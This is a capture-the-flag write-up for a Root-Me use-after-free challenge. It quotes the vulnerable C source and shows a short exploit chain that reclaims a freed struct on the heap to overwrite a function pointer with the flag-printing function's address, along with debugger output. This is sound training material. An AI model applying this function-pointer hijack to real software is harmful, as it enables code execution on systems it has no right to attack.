## Version 2.0
## language: en

Feature: elf-x86-use-after-free-basic
  Site:
    root-me
  Category:
    app-systeme
  User:
    m'baku
  Goal:
    Exploit the bug and read the flag

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.5   |
    | gdb-pwndbg      | 1.1.0     |
    | VMware          | 15.5.6    |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then I see the environment configuration
    """
    PIE: disabled
    Relro: enable
    NX: enable (heap and stack)
    ASLR: enable
    SF: enable
    SSP: enable
    SRC: enable
    """
    And the source code of the challenge is provided

  Scenario: Success: Analyzing the binary
    Given the source code is provided
    Then I can understand the program without disassembling
    And the program is very simple It has 2 main structures
    """
    struct Dog {
        char name[12];
        void (*bark)();
        void (*bringBackTheFlag)();
        void (*death)(struct Dog*);
    };

    struct DogHouse{
        char address[16];
        char name[8];
    };
    """
    Then the binary has a menu to perform certain functions
    """
    dog = newDog(line);
    dog->bark();
    dog->death(dog);
    dogHouse = newDogHouse();
    ...
    """
    Then as the functions indicate they allow to create a house for the dog
    And assign a name to the dog, see the death of the dog and make it bark
    Then after analyzing each one of the functions I realize a bug in:
    """
    void death(struct Dog* dog){
        printf("%s run under a car... %s 0-1 car\n", dog->name, dog->name);
        free(dog);
    }
    """ [evidences](bug.png)
    And this bug is due to the fact that
    When freeing the memory it is not reset (zeroed)
    And this can allow attacks like "Use-After-Free" or "Double free"

  Scenario: Success: Exploiting the bug and reading the flag
    Given I recognize the bug
    Then there is a function provided by the binary called "bringBackTheFlag()"
    """
    void bringBackTheFlag(){
        char flag[32];
        FILE* flagFile = fopen(".passwd","r");
        if(flagFile == NULL)
        {
            puts("fopen error");
            exit(1);
        }
        fread(flag, 1, 32, flagFile);
        flag[20] = 0;
        fclose(flagFile);
        puts(flag);
    }
    """
    Then this function is not called by the binary
    And it is the one that prints the flag
    Then it is clear to me how to exploit it, the idea is to call this function
    And for this I take advantage of the UAF (Use after Free)
    Then it's simple, I free the memory of the Dog's structure
    And thanks to the first-fit behavior of GLIBC allocator
    Then I can assign the structure of DogHouse in the same position of the Dog
    And overwrite the pointer "void (*bark)();" to bringBackTheFlag() function
    Then the full chain would be like:
    """
    buy_dog('perro')
    death()
    build_house('A' * 12 + p32(0x804877a), 'B' * 8)
    bark()
    """
    And the pointer 0x804877a is the address of the function bringBackTheFlag()
    Then I used gdb-pwngdb to determine this address
    """
    pwndbg> p bringBackTheFlag
    $1 = {<text variable, no debug info>} 0x804877a <bringBackTheFlag>
    pwndbg>
    """ [evidences](bringback.png)
    And voila, my full exploit is: [evidences](exploit.py)
